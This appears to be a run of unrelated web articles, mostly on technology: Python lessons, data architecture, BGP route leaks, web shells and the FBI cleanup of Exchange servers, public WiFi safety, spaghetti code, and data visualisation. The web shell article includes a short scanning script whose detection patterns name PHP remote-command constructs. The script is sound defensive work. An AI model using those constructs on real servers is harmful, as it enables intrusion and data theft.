- Get Started: Get started with Python syntax in this lesson and then create a point-of-sale system for a furniture store!
- Control Flow: Learn how to build control flow into your Python code by including if, else, and elif statements. Expect to learn all you need to know about boolean variables and logical operators.
- Lists: Learn about lists, a data structure in Python used to store ordered groups of data.
- Loops: Loops are structures that let you repeat Python code over and over. Learn how to read loops and write them to solve your own problems.
- Functions: Learn about code reuse with Python functions. Apply that knowledge to create functions for famous physics formulas.
- Python Code Challenge: Code challenge to test your Python knowledge!
- Strings: Learn all about the Python string object. Figure out how to automatically create, rearrange, reassign, disassemble, and reassemble blocks of text!
- Modules: Learn how modules work in the Python programming language.
- Dictionaries: Learn all about the Python dictionary structure and how to create and use key-value pairs in your code.
- Files: Learn how to work with files in an automated way! Investigate the properties of text, CSV, and JSON files by reading and writing to them!
- Classes: Learn about the differences between data types in Python and how to create your own classes, objects, and interfaces.
- Python Code Challenge 2: Code challenge to test your Python knowledge!
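As a small taste of what the Control Flow, Lists, Loops, and Functions lessons cover (this snippet is illustrative and not taken from the course materials):

```python
# Illustrative example only, not from the course materials.
def shipping_cost(weight_kg: float) -> float:
    """Return a shipping price using if/elif/else control flow."""
    if weight_kg <= 2:
        return 5.0
    elif weight_kg <= 10:
        return 12.5
    else:
        return 20.0

# A list of parcel weights, processed with a loop.
parcels = [1.5, 7.0, 22.3]
for weight in parcels:
    print(f"{weight} kg costs ${shipping_cost(weight):.2f}")
```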
There are a number of studies that show how easily things like social media and Candy Crush can ruin your life. On one hand, there are rare and extreme cases where this has actually happened. On the other hand, let's ask ourselves what good technology can do for us, our mental health, and our society. It's easier to focus on the bad than the good. As helpful as technology can be, it can cause negative side effects if you're not careful. The most common problems come from eye and neck strain. Here are a few tips on what you can do to avoid them:

Let's get physical, physical, as they used to say. It's easy to get lost in your newsfeed for what seems like hours. Being inactive for too long can cause health problems, such as back problems and muscle degeneration. Doctors suggest stretching every 30-40 minutes. Walk to the other room, stretch your arms, roll your shoulders, and get your blood pumping again.

Protect Your Eyes

Long exposure to smartphones, screens, or TVs can cause major eye strain from the blue light the screens emit. How does this light affect your eyes? Blue light consists of the shortest wavelengths in the color spectrum, which carry the highest amount of energy. Due to this, long exposure to blue light causes eye strain. A lot of devices now have the ability to dim the amount of blue light emitted. Another way to diminish your exposure to blue light is to use screen filters, like this blue light blocking screen panel from Amazon that simply slips onto your monitor. You can also block blue light with a pair of fashionable, yet techy, glasses designed for the purpose, which you can find on Amazon as well.

There are many concerns that technology is causing negative impacts on children, teenagers, and young adults growing up in today's tech-rich environments. However, with proper use and parental guidance, technology can have a positive impact on the lives of children. Children now use technology more than ever in the classroom, and the results are in. According to a survey from the University of Phoenix, 63% of K-12 teachers used tech in the classroom in 2018. Integrating technology into education has helped teachers and students achieve more in the classroom and develop critical skills for the future. Major companies such as Microsoft and Google offer education-focused software that allows teachers to review a student's progress with analytics and engage with students on an individual basis.

Getting More Done

Cloud-based apps such as Socrative allow students to answer pop quizzes quickly through their laptops or smartphones. Instead of spending up to 20 hours a week grading papers, these cloud-based solutions allow teachers to spend more quality time on lessons and one-on-one time with students. Another great app for teachers is Bloomz. It allows teachers to easily network and build relationships with their students' parents. This new level of connectivity between student, teacher, and parent is only possible due to innovations within the tech field. Involving a child's parents is another fail-safe for ensuring their success in school and in life.
More Clients, More Profit

With the rise of online shopping and e-commerce, small businesses are clutching their pearls. The transition to online platforms for buying and selling has helped businesses thrive more than they could with a brick-and-mortar shop alone. Instead of offering products and services to a local community, business owners are expanding to locations far outside their area code. For businesses that don't see profit from goods and focus more on the service side, technology is also playing a huge role in getting more people through the door. Companies are able to better advertise their solutions with online marketing services, such as social media and Google Ads.

Having a strong presence on the web is essential for any business, big or small. It allows new potential clients to learn more about your business and become more educated about your offerings before making a decision. Being able to connect with customers and clients in real time with e-mail solutions has also allowed businesses to build stronger relationships with their partners. Their profit margins speak for themselves. For businesses that don't use a private e-mail service, you should look into making the switch to a stronger and more secure e-mail provider, such as Kustura Technologies. We offer e-mail security and privacy that you won't see with Gmail or Yahoo. Having a custom domain (your_name@your_business.com) can also help boost client confidence in you and your business.

Good or Evil?

When we think about technology, it's neither good nor evil. It's how we use it that determines its impact on our lives. Disconnecting and going off the grid is definitely an option for those who don't like this new age of smart-everything, including notebooks, light bulbs, and soon everything under the sun (check out our top list of gadgets to see what we mean). While technology can have its downsides, the positive impact it has had on our lives as a society outweighs the bad by far. Let us know in the comments how you feel about technology: is it helping or hurting us?
Too often, the design of new data architectures is based on old principles: they are still very data-store-centric. They consist of many physical data stores in which data is stored repeatedly and redundantly. Over time, new types of data stores, such as data lakes, data hubs, and data lakehouses, have been introduced, but these are still data stores into which data must be copied. In fact, when data lakes are added to a data architecture, it's quite common to introduce not one data store, but a whole set of them, called zones or tiers. Having numerous data stores also implies that many programs need to be developed, maintained, and managed to copy data between the data stores.

Modern Forms of Data Usage

Organizations want to do more with data and support new forms of data usage, from the most straightforward to the most complex and demanding. These new, more demanding use cases are driven by initiatives described by such phrases as "becoming data-driven" and "digital transformation." Most organizations have evaluated their current ICT systems and have found them unable to adequately support these new forms of data usage. Conclusion: a new data architecture is required.

Legacy Design Principles will not Suffice

As indicated, the inclination is still to develop data processing infrastructures based on a data architecture centered around data stores and copying data. This repeated copying and storing of data reminds me of designing systems in the mainframe era. In those legacy architectures, data was also copied and transformed step by step in a batch-like manner. Shouldn't the goal be to minimize data stores, data redundancy, and data copying processes?

Data-store-centric thinking exhibits many problems. First, the more often data is physically copied before it's available for consumption, the higher the data latency. Second, with each copying process, a potential data quality problem may be introduced. Third, physical databases can be time-consuming to change, resulting in inflexible data architectures. Fourth, from a GDPR perspective, it may not be convenient to store, for example, customer data in several databases. Fifth, such architectures are not very transparent, leading to report results that are less trusted by business users. And so on.

New data architectures should be designed to be flexible, extensible, easy to change, and scalable, and they should offer low data latency (to some business users) with high data quality, deliver highly trusted reporting results, and enable easy enforcement of GDPR and comparable regulations.

Agile Architecture for Today's Data Usage

During the design of any new data architecture, the focus should be less on storing data (repeatedly) and more on processing and using the data. If we are designing a new data architecture, then deploy virtual solutions where possible. Data virtualization enables data to be processed with less need to store the processed data before it can be consumed by business users. Some IT specialists might be worried about the performance of a virtual solution, but if we look at the performance of some newer database servers, that worry is unnecessary.

Most organizations need new data architectures to support the fast-growing demand for data usage. Don't design a data architecture based on old architectural principles. Don't make it data-store-centric. Focus on the flexibility of the architecture. Prefer a virtual solution over a physical one.
This will enable ICT systems to keep up with the speed of business more easily while providing better, faster support for new forms of data usage.
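To make the "virtual solution" idea concrete, here is a toy sketch (invented tables, a single in-memory database standing in for separate source systems; real data virtualization platforms federate heterogeneous sources at query time). The point is that consumers query a combined view while no third, copied data store is ever created:

```python
# Toy analogy for data virtualization using stdlib sqlite3:
# a view exposes combined data without physically copying it.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE crm_customers (id INTEGER, name TEXT)")
conn.execute("CREATE TABLE erp_orders (customer_id INTEGER, amount REAL)")
conn.execute("INSERT INTO crm_customers VALUES (1, 'Acme'), (2, 'Globex')")
conn.execute("INSERT INTO erp_orders VALUES (1, 250.0), (1, 100.0), (2, 75.0)")

# Consumers query the view directly; nothing is duplicated.
conn.execute("""
CREATE VIEW customer_revenue AS
SELECT c.name, SUM(o.amount) AS revenue
FROM crm_customers c JOIN erp_orders o ON o.customer_id = c.id
GROUP BY c.name
""")

for row in conn.execute("SELECT * FROM customer_revenue"):
    print(row)
```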
On November 5th, 2012 at roughly 6pm PST, Google's services went offline. A lot of companies rely on their Gmail, Gdocs and Gdrives to exchange work-related content, so losing access to these services is a big deal. But understanding some of the pitfalls of the internet may explain how this can happen even to Google.

We'll keep it simple: the internet is held together by a collection of networks known as "Autonomous Systems" (AS), with every network having its own AS number. These networks are connected by a routing system called the "Border Gateway Protocol". The BGP, as it is known, tells which IP addresses belong to which network and routes traffic between AS numbers accordingly. Routes are pathways from one IP address to another; the AS simply establishes the connection.

That's cool, but still, the question remains: why does this stuff matter? BGP relies heavily on trust. In other words, if one network says a specific set of IP addresses is behind it, no one questions it. Traffic is simply routed across a specific pathway on the network. The trouble starts when a network announces addresses that are not actually behind it. Sometimes it's a malicious act and other times it's not. In Google's case, information about IP routes was misrouted or "leaked", or simply not announced correctly by the BGP system.

Still with me? Okay, here we go: sometimes, for malicious reasons or not, IP addresses can be "leaked" outside their normal paths. More likely it was an honest mistake, and a lesson that failings of the BGP system do tend to happen from time to time.

So what's the solution? Most network engineers have established relationships with each other, so they can communicate when route leakage occurs. Chances are, once a network becomes unresponsive, an engineer is on the phone to notify the identified networks to stop announcing routes they don't actually represent. As soon as that happens, BGP can successfully route IP addresses to the correct place.

Although this may all seem moot, an update from Google stated it was simply a hardware failure. Go figure, but route leakage does and will happen again. The internet's a wild place, isn't it?

For more information contact James Mulvey
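If you want to see the AS-to-prefix mapping described above for yourself, the hedged sketch below uses the third-party Python library ipwhois to look up which autonomous system announces a given address (the address is just an example, and the exact fields returned can vary by registry):

```python
# Sketch: look up the AS that announces an IP address.
# Requires the third-party ipwhois package (pip install ipwhois).
from ipwhois import IPWhois

result = IPWhois("8.8.8.8").lookup_rdap()  # example address (a Google resolver)

# Registry data includes the originating AS number and a description.
print(result["asn"])              # e.g. "15169"
print(result["asn_description"])  # e.g. "GOOGLE, US"
print(result["asn_cidr"])         # the announced prefix
```

When a route leak occurs, the path traffic actually takes no longer matches what lookups like this suggest, which is one reason engineers compare live announcements against registry data.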
Microsoft has recently seen many attacks by hackers using so-called web shells. The number of web shell attacks between August 2020 and January 2021 doubled compared to the same period a year earlier. But what are they exactly, and how can you fight them?

Microsoft recorded a total of 144,000 web shell attacks between August 2020 and January 2021. Web shells are very lightweight programmes (scripts) that hackers install either to attack affected websites or web-facing services, or to prepare a future attack. A web shell allows hackers to execute standard commands on web servers that have been compromised. Web shells use code such as PHP, JSP or ASP for this purpose. When web shells are successfully installed, the hackers are able to execute the same commands as the website's administrators can. They can also execute commands that steal data, install malicious code and provide system information that allows hackers to penetrate deeper into networks. Web shells are also a persistent form of 'backdoor' that continues to affect compromised servers.

They are notoriously difficult to discover, partly because they have different ways of executing commands. Hackers also hide these commands in user agent strings and parameters that are exchanged between attackers and the attacked websites. Furthermore, web shells can be hidden in media files or other non-executable file formats. There are some indicators that might help you find out whether web shells are present on a server: unknown connections in the server logs, abnormally high server usage, files with abnormal timestamps, and a lot of other signs. But even with these indicators, web shells remain very difficult to discover.

To combat attacks using web shells, there are a number of possible solutions. These include discovering the programs by identifying and resolving vulnerabilities and misconfigurations in web applications and web servers through the use of threat and vulnerability management. In addition, attacks can be prevented by proper segmentation of the perimeter network, so that attacked web servers do not cause further damage in the rest of the network. Furthermore, companies must always install antivirus protection on the servers, as this can prevent the malware from being installed on the machines. We have already been made aware of cases where only email protection was in place on these servers; that, of course, offers no protection against malware on the actual server or against certain types of targeted attacks. Finally, companies should audit and view the logs of their web servers more frequently. This will give them more awareness of which systems might be exposed to the Internet.
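As a rough illustration of the file-based indicators above (a simplistic heuristic sketch, not a substitute for proper threat and vulnerability management; the web root path and the patterns are assumptions), a short script can flag PHP files containing constructs that frequently appear in web shells:

```python
# Naive web shell heuristic: flag PHP files containing constructs
# commonly abused by web shells. Path and patterns are examples only;
# expect both false positives and false negatives.
from pathlib import Path

SUSPICIOUS = ["eval(base64_decode", "system($_GET", "shell_exec($_POST"]
WEB_ROOT = Path("/var/www")  # assumed web root

for php_file in WEB_ROOT.rglob("*.php"):
    try:
        content = php_file.read_text(errors="ignore")
    except OSError:
        continue  # unreadable file; skip it
    for pattern in SUSPICIOUS:
        if pattern in content:
            print(f"suspicious: {php_file} contains {pattern!r}")
```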
During the Hafnium attack and other recent MS Exchange attacks, web shells were used, among other things, to install ransomware on the compromised servers and to steal data. Then, suddenly, the FBI took action by itself. A couple of weeks ago, the American investigation service announced that it had removed web shells from hundreds of compromised servers via a court order. The removed web shells belonged to a group that took advantage of Exchange vulnerabilities at an early stage to gain access to the networks of US organizations and companies. These web shells each had a unique path and file name, making it potentially more difficult for the server owners to find and remove them. In this initiative, spearheaded by the FBI, hundreds of Microsoft Exchange servers infected with malware in the United States were cleaned up.

However, the fact that affected organizations were only made aware of this after the fact has garnered mixed reactions from security experts and security companies. "The FBI is breaking into American computers to remove malware - and is breaking the law to do so," said whistleblower Edward Snowden. Experts told SecurityWeek that the action sets a dangerous precedent of giving law enforcement agencies broad permission to break into computers suspected of being compromised. However, there are also experts who agree with the FBI's action, as it protects companies that may lack a strong technical background. A security researcher with the alias The Grugq stated in a reaction that the infected Exchange servers that have been cleaned up will probably be compromised again.

There are also legal questions about the method being used. "This warrant is a very powerful and potentially dangerous tool that gives the government permission to access the computers of innocent people to delete files without notice," Kurt Opsahl of the US civil rights movement EFF told The Washington Post. While there are many doubts about whether this action was ethically reasonable in this case, the good news is that the FBI is at least informing all owners and administrators of the servers from which it has removed the web shells. If the contact details are public, the US investigation service sent an e-mail. If the contact details are not known, the FBI informed the provider of the owner concerned, who in turn alerted the infected and cleaned-up client. The question remains whether an action like this would have been possible in the EU.

Of course, although the web shells have been successfully removed, the underlying vulnerabilities in the Exchange servers have not been patched. It is also possible that other malware is still present on the systems. Companies should definitely double-check their servers for malware. The fact that the FBI has removed one particular thing from a compromised system does not constitute a clean bill of health for the machine in question.

The affair leaves one uncomfortable question lingering, which goes back to Mr Opsahl's statement: if law enforcement is allowed to step in and make changes to a system, doesn't this leave open a lot of potentially undesirable options? Could this be a precedent for issuing carte blanche to any and all investigators to just go and gather supposed evidence in a "no holds barred" way, even if no crime has been committed? Or worse, to surreptitiously plant evidence? This is a dangerous path to go down. There is a lot of potential for irreparable damage, not only to the data that companies handle and were entrusted with, but also to people's trust in the authorities, which in some areas is not great to begin with.

This move could not have come at a worse time. Germany, always a stalwart defender of privacy, has just greenlit a new piece of national law that would force providers to assist law enforcement in planting surveillance software on a suspect's devices, even if no crime may have been committed (yet). All opposition and well-founded criticism was shot down; drafts were submitted with only days to examine and provide feedback. This will no doubt have a signaling effect.
These days, you can find WiFi hotspots almost anywhere. Universities, libraries, hotels, airports, and many more service providers make WiFi hotspots available in their spaces for customer convenience. A lot of people use and enjoy this service without confirming that it is safe. The problem with these networks in public places is that they're rarely secure, as hotspot providers often pay little attention to public WiFi security. When you are connected to such networks and you send information to apps and websites, cybercriminals can gain remote access to that information quite easily. But there are ways to use public WiFi safely.

Why public WiFi security is so important

If you log into an unencrypted website via an unsecured network, others connected to the same network may be able to see the information you view or send. They may be able to sign in to your accounts as you and cause damage. Your sensitive documents, credit card details, private photos, and contacts can be stolen by cybercriminals. They may be able to hack other websites related to you, steal your money, borrow money from loan apps or even impersonate you to scam family and friends in your contact list. They can steal your identity and cause unimaginable damage.

Another reason you should secure your information while on public WiFi hotspots is to prevent the hotspot provider from gaining unsanctioned access to your information and internet traffic, whether at hotels, schools, airports, or other public places.

Is public WiFi safe?

Public WiFi networks can be safe when you use them with caution. It may seem scary, but some solutions can help you use public WiFi securely. Since you can do very little to guarantee that public WiFi hotspots are safe, these are steps to take to make sure you use public WiFi safely.

- Connect only to secure sites. This means you should only connect to websites with HTTPS in their addresses. However, an HTTPS address alone does not mean the website is authentic. Cybercriminals also know how to encrypt websites and make them look legit. So though your data cannot be accessed by criminals using the same public hotspot as you, it could still be en route to hackers if you are hopping onto a scam website.
- Use a VPN (a virtual private network). Virtual private networks help you encrypt your data in such a way that hackers won't be able to crack it or gain access to it. This is arguably the best way to stay safe on public WiFi networks. VPNs can be free or paid, and it is advisable to go for paid VPNs, as the free types are often created for suspicious purposes like data theft.
- Make use of your phone's mobile data. Since your phone's data is usually encrypted, you should make use of it when in public spaces, especially when you are going to be typing and sending your personal or financial details to apps or websites. Your mobile data is always a more secure option, since we can't be sure that public WiFi hotspots are secure.

Other than the above-mentioned steps, there are many other ways to protect yourself and your data from cybercrime. Below are some of these steps:

- Don't access personal or financial information over public networks.
- Log out immediately if you accidentally find yourself on an unencrypted website.
- Log out each time you are done using an account.
- To prevent hackers who gain access to one of your accounts from breaking into your other accounts, use distinct passwords for each of your accounts.
- Many browsers, such as Chrome, will give you a warning when you are about to enter an insecure site or download a malicious file. Pay attention to these warnings.
- Ensure you always keep your browser and anti-malware software up to date.
- Change your settings to avoid automatically connecting to public WiFi.

Whether we want to continue working over a lunch break or need to do a little online research in the school library, public hotspots provide us with much-needed convenience. What matters is that we take public WiFi security seriously to avoid privacy invasion and identity theft.
Lean Yellow Belt explores the concepts of lean, basic tools and techniques, and the integration of lean culture, rapid process improvement, lean metrics, and ideas for sustaining lean within any organization. Lean Yellow Belt covers a variety of methods used by the lean team to improve a process, including 5S, Value Stream Mapping, and Kaizen, to name a few. The Lean Yellow Belt is 3 days in duration due to the number of methodologies that are discussed.

The Lean Six Sigma Yellow Belt is a 1-day course that covers Waste, Lean, and Six Sigma definitions. The Six Sigma DMAIC (Define, Measure, Analyze, Improve, Control) methodology is taught and utilized to teach problem solving. Neither of these courses requires a math background, although basic algebra is used in some of the sessions.
Today, the US Library of Congress announced that it has acquired the entire Twitter public archive going back to March 2006. At over 50,000 tweets per day, that amounts to billions of tweets. The announcement raises a number of considerations.

The first cements the concept that social media posts are forever. This is not new… is it? The Library of Congress is, among other things, a one-way vault for collecting information. As such, it may cause one to rethink a post before hitting the return key.

The second is a change to the way information is organized. Today, many think in terms of centralizing data as much as possible. But with the increase in both sources and end points, that strategy is flawed. Rather than collecting information into a central source, we need a way to connect the different data sources. This does a couple of things. First, it eliminates the need to duplicate data to multiple locations. Second, it removes the need to make assumptions about the organization of data. Put another way, data organization becomes more abstract and dynamic.

Third, mobile devices are used more than ever to access data. The physical location and connectivity method of those devices varies from device to device and day to day. In essence, a new architecture is needed to create dynamic organization of data. This also requires a more robust global network to bring data from different sources dynamically.
Spaghetti code is not an endearing term. It's a piece of jargon that describes a type of code that, some say, will cause your technology infrastructure to fail. Despite the warnings, many enterprise businesses still face the tangle of processes and errors that make up spaghetti coding. This occurs for a number of reasons, but most experts believe it can be detrimental to your overall infrastructure. In this article, we'll talk about spaghetti code as a concept and what it means for your organization.

What is Spaghetti Code?

Spaghetti code is a pejorative piece of information technology jargon for code caused by factors like an unclear project scope of work, a lack of experience and planning, an inability to conform a project to programming style rules, and a number of other seemingly small errors that build up and make your code less streamlined over time. Typically, spaghetti code appears when multiple developers work on a project over months or years, continuing to add and change code and software scope without optimizing the existing programming infrastructure. This usually results in unplanned, convoluted coding structures that favor GOTO statements over structured programming constructs, producing a program that is not maintainable in the long run.

For businesses, creating a program only to have it become unmaintainable after years of work (and money) have gone into the project wastes budget, IT managers' time, and other resources. In addition, it is frustrating for programmers to spend hours building a coding infrastructure only to have something break, and then have to sift through years of work, often managed by different developers, to identify the issue, if they can solve it at all. For these reasons, spaghetti code is considered a nuisance to developers and IT managers, and enterprise businesses that have to manage their resources should avoid it completely.

History of Spaghetti Code

While it's not clear who coined the term "spaghetti code" or when, it was being used to describe a tangled mess of code lacking structure by the late 1970s. In the 80s, the term was used at least once in a whitepaper to describe the code-and-fix model that led to the development of waterfall programming. However, the vast majority of books from that era refer to it as a nest of messy code lacking the structure required to scale effectively. A 1981 coding satire raised the idea that the founders of IBM must have been fond of spaghetti code because of how they developed FORTRAN.

In Richard Hamming's book, The Art of Doing Science and Engineering: Learning to Learn, he said:

"If, in fixing up an error, you wanted to insert some omitted instructions then you took the immediately preceding instruction and replaced it by a transfer to some empty space. There you put in the instruction you just wrote over, added the instructions you wanted to insert, and then followed by a transfer back to the main program. Thus the program soon became a sequence of jumps of the control to strange places. When, as almost always happens, there were errors in the corrections you then used the same trick again, using some other available space. As a result the control path of the program through storage soon took on the appearance of a can of spaghetti.

"Why not simply insert them in the run of instructions? Because then you would have to go over the entire program and change all the addresses which referred to any of the moved instructions! Anything but that!"
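Hamming's "sequence of jumps" translates directly into modern code. As a contrived illustration (not from any source cited here), the first half below emulates goto-style control flow with state flags and jumps of control, while the second half expresses the same logic with structured constructs:

```python
# Contrived example: goto-style spaghetti emulated with state flags.
state = "read"
value, total = 0, 0
while True:
    if state == "read":
        value += 1
        state = "check" if value < 5 else "done"
    elif state == "check":
        total += value
        state = "read"
    elif state == "done":
        break

# The same logic with structured constructs: nothing to untangle.
total_structured = sum(range(1, 5))
assert total == total_structured
```

The two versions compute the same sum, but only the tangled one forces a reader to simulate the jumps in their head to see what it does.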
How Does it End Up in Your Infrastructure?

Spaghetti programming is not clean or structured and flies in the face of the scopes and models put together by enterprise businesses; so how does it get there? Spaghetti code occurs when certain conditions are met:

- A programmer or programmers did not take care to finesse the architecture using programming constructs, and instead relied on easier or less thought-out approaches, or simply dove into a project and started coding without a plan.
- Development best practices and the most streamlined coding languages change over time, so as programming evolves, existing systems should be optimized to keep them clean and structured. When this fails to occur, it creates an ecosystem of spaghetti code.
- While spaghetti code can occur just hours after starting a project, in enterprise business it often accumulates over a longer period as a project changes hands between programmers.
- Spaghetti code can occur when someone lacks experience and uses simpler techniques, like GOTO commands, instead of more refined ones that secure the structural integrity of the program architecture.

In general, spaghetti code is the natural result when businesses fail to plan for a reliable architecture over the life of a project.

Spaghetti Code: How to Avoid It

To avoid a tangle of inefficient spaghetti code, programmers must:

- Be diligent: First and foremost, diligence and attention to detail are key. A developer must be keenly focused on creating the best architecture for their project and must not rush it.
- Unit test often: By performing regular unit tests, you can reduce the likelihood that spaghetti code will occur.
- Double-check your programmers: An extra set of eyes can help. If you come across spaghetti code, address it immediately and ask that it be changed.
- Use lightweight frameworks: In 2020, there are a number of lean, lightweight frameworks you can implement. By keeping the framework streamlined, you are setting yourself up for more simplified solutions.
- Implement layers: In practice, layers help you correct spaghetti code more easily by addressing a single layer instead of an entire program.

Related Code Types

There are a few related types of code you can review for additional learning:

- Ravioli code: The term for errors in object-oriented code that occur when code is easy to understand within a class but not in the context of the entire project.
- Lasagna code: A problem that can occur when you use layers to avoid spaghetti code and the layers are so interdependent on one another that a single break in a layer affects the whole project.
- Pizza code: If a code architecture is too flat, it's called pizza code.
*** Excerpt from a book*** The origin or the etymological derivative of personality comes from the word "persona", the theatrical masks worn by the Romans in Greek and Latin drama. Personality also comes from the two Latin words "per" and "sonare", which literally mean "to sound through". This concept extends to Jung's component of "persona", meaning "public image", which refers to the role expected by social or cultural convention.

Definitions of personality by psychologists
1. Personality is the totality of individual psychic qualities, which includes temperament, one's mode of reaction, and character, the objects of one's reaction (Fromm, 1974)
2. Personality may be biologically defined as the governing organ or superordinate institution of the body in as much as it is located in the brain. "No brain, no personality" (Murray, 1951)
3. Personality is a person's unique pattern of traits. (Guilford, 1959)
4. Personality is the record of a person's experiences and behavior together with the psychological systems, which contribute causal determination to the existing and functioning record. Some causal determination is found within the record itself. (Cartwright, 1979)
5. Personality is the impression an individual makes on others. It refers to his/her social skills, charismatic qualities and the like (Hall, Calvin and Gardner, 1985)
6. Personality is generally defined as the individual's unique and relatively stable patterns of behavior, thoughts and emotion (Burger, 1990)
7. Personality is the stability in people's behavior that leads them to act uniformly both in different situations and over extended periods of time (Felman, 1994)
All the definitions above equate personality with the essence or the uniqueness of behavior.

Allport's definition of personality
In 1937, Allport defined personality as "what a man really is". This statement indicates that personality is the typical and peculiar characteristics of a person. In 1961, after 24 years, Allport modified his definition to a dynamic organization within the individual of the psycho-physical systems that determine his or her characteristic behaviors and thoughts.
dynamic organization – personality is constantly evolving and changing. A newborn infant lacks personality because his or her behavior keeps on changing. An infant's personality is influenced by heredity and by the surrounding conditions. Personality development begins at birth and unfolds gradually until death.
psycho-physical – personality is neither exclusively mental nor exclusively neural. The organization entails the operation of both body and mind. People's functions include vegetative, sentient and rational functions.
characteristic behaviors and thoughts – this phrase replaced "unique adjustments to the environment" in Allport's original (1937) definition of personality. The earlier definition seemed to place too much emphasis on biological needs. His revised definition covers all behaviors and thoughts.
*** This information is from a book, I don't know the book title and the author (just copied it in my notes). If you do, feel free to send me a message so that the book title and author will be added as source. ***
<urn:uuid:9eef102a-57d9-4daf-aeba-624f826accdf>
CC-MAIN-2022-40
https://jeffric.com/personality/6/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00469.warc.gz
en
0.929266
671
3.734375
4
The late data visionary Hans Rosling mesmerised the world with his work, contributing to a more informed society. Rosling used global health data to paint a stunning picture of how our world is a better place now than it was in the past, bringing hope through data. Now more than ever, data are collected from every aspect of our lives. From social media and advertising to artificial intelligence and automated systems, understanding and parsing information have become highly valuable skills. But we often overlook the importance of knowing how to communicate data to peers and to the public in an effective, meaningful way. The first tools that come to mind in considering how to best communicate data – especially statistics – are graphs and scatter plots. These simple visuals help us understand elementary causes and consequences, trends and so on. They are invaluable and have an important role in disseminating knowledge. Data visualisation can take many other forms, just as data itself can be interpreted in many different ways. It can be used to highlight important achievements, as Bill and Melinda Gates have shown with their annual letters in which their main results and aspirations are creatively displayed. Everyone has the potential to better explore data sets and provide more thorough, yet simple, representations of facts. But how do we do this when faced with daunting levels of complex data?

A world of too many features

We can start by breaking the data down. Any data set consists of two main elements: samples and features. The former correspond to individual elements in a group; the latter are the characteristics they share. Anyone interested in presenting information about a given data set should focus on analysing the relationship between features in that set. This is the key to understanding which factors are most affecting sales, for example, or which elements are responsible for an advertising campaign's success. When only a few features are present, data visualisation is straightforward. For instance, the relationship between two features is best understood using a simple scatter plot or bar graph. While not that exciting, these formats can give all the information that system has to offer. Data visualisation really comes into play when we seek to analyse a large number of features simultaneously. Imagine you are at a live concert. Consciously or unconsciously, you're simultaneously taking into account different aspects of it (stagecraft and sound quality, for instance, or melody and lyrics), to decide whether the show is good or not. This approach, which we use to categorise elements in different groups, is called a classification strategy. And while humans can unconsciously handle many different classification tasks, we might not really be conscious of the features being considered or realise which ones are the most important. Now let's say you try to rank dozens of concerts from best to worst. That's more complex. In fact, your task is twofold, as you must first classify a show as good or bad and then put similar concerts together.

Finding the most relevant features

Data visualisation tools enable us to bunch different samples (in this case, concerts) into similar groups and present the differences between them. Clearly, some features are more important in deciding whether a show is good or not. You might feel an inept singer is more likely to affect concert quality than, say, poor lighting.
Figuring out which features impact a given outcome is a good starting point for visualising data. Imagine that we could transpose live shows onto a huge landscape, one that is generated by the features we were previously considering (sound for instance, or lyrics). In this new terrain, great gigs are played on mountains and poor ones in valleys. We can initially translate this landscape into a two-dimensional map representing a general split between good and bad. We can then go even further and reshape that map to specify which regions are rocking in "Awesome Guitar Solo Mountain" or belong in "Cringe Valley". From a technical standpoint, this approach is broadly called dimensionality reduction, where a given data set with too many features (dimensions) can be reduced into a map where only relevant, meaningful information is represented. While a programming background is advantageous, several accessible resources, tutorials and straightforward approaches can help you capitalise on this great tool in a short period of time. Network analysis and the pursuit of similarity Finding similarity between samples is another good starting point. Network analysis is a well-known technique that relies on establishing connections between samples (also called nodes). Strong connections between samples indicate a high level of similarity between features. Once these connections are established, the network rearranges itself so that samples with like characteristics stick together. While before we were considering only the most relevant features of each live show and using that as reference, now all features are assessed simultaneously – similarity is more broadly defined. The amount of information that can be visualised with networks is akin to dimensionality reduction, but the feature assessment aspect is now different. Whereas previously samples would be grouped based on a few specific marking features, in this tool samples that share many features stick together. That leaves it up to users to choose their approach based on their goals. Venturing into network analysis is easier than undertaking dimensionality reduction, since usually a high level of programming skills is not required. Widely available user-friendly software and tutorials allow people new to data visualisation to explore several aspects of network science. The world of data visualisation is vast and it goes way beyond what has been introduced here, but those who actually reap its benefits, garnering new insights and becoming agents of positive and efficient change, are few. In an age of overwhelming information, knowing how to communicate data can make a difference – and it can help keep data's relevance in check.
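As a concrete illustration of the two approaches discussed above, the sketch below applies dimensionality reduction and a simple similarity network to invented "concert" data. The use of scikit-learn and networkx, the random feature scores, and the 0.7 similarity threshold are all assumptions made for illustration, not tools or values prescribed by the article.

```python
# Illustrative sketch only: the concert "features" and the choice of
# scikit-learn / networkx are assumptions, not taken from the article.
import numpy as np
from sklearn.decomposition import PCA
import networkx as nx

rng = np.random.default_rng(0)
# 30 concerts scored on 5 features (sound, lyrics, stagecraft, melody, lighting)
concerts = rng.random((30, 5))

# Dimensionality reduction: collapse 5 features into a 2-D "map"
coords = PCA(n_components=2).fit_transform(concerts)
print(coords.shape)  # (30, 2) -- each concert becomes a point on the map

# Network analysis: connect concerts whose overall feature profiles are similar
graph = nx.Graph()
for i in range(len(concerts)):
    for j in range(i + 1, len(concerts)):
        # Normalised similarity in [0, 1]; the 0.7 cut-off is arbitrary
        similarity = 1.0 - np.linalg.norm(concerts[i] - concerts[j]) / np.sqrt(5)
        if similarity > 0.7:
            graph.add_edge(i, j, weight=similarity)

# Groups of similar concerts fall out as connected components of the network
print([sorted(component) for component in nx.connected_components(graph)])
```

The first print shows every concert reduced to a point on a two-dimensional map; the second shows clusters of concerts that share many features, which is the grouping behaviour the article describes for network analysis.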
<urn:uuid:6e409e34-d50a-437e-be70-9d1168cd7ab7>
CC-MAIN-2022-40
https://dataconomy.com/2017/05/data-visualisation-features/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00469.warc.gz
en
0.952882
1,184
3.421875
3
What is Self-Service? The Gartner definition of self-service is "a form of business intelligence (BI) in which line-of-business professionals are enabled and encouraged to perform queries and generate reports on their own, with nominal IT support". Other definitions offer up the idea that self-service is the platform that allows business users to utilize data to spot business opportunities, without requiring them to have a background in statistics or technology. This approach allows business users to make data-driven decisions in real time without having to rely on information technology (IT) staff or data scientists to create reports.

